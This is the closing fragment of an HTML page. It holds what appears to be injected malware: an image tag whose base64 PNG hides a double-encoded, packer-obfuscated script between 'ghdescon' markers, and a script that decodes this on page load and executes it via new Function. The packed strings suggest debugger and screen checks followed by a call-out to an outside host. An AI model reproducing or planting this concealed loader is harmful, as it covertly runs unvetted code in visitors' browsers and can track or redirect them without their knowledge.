218 <img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
219<script type="text/javascript">
220if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
221setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(13);}, 500);
222</script>
223 </body>
224
225</html>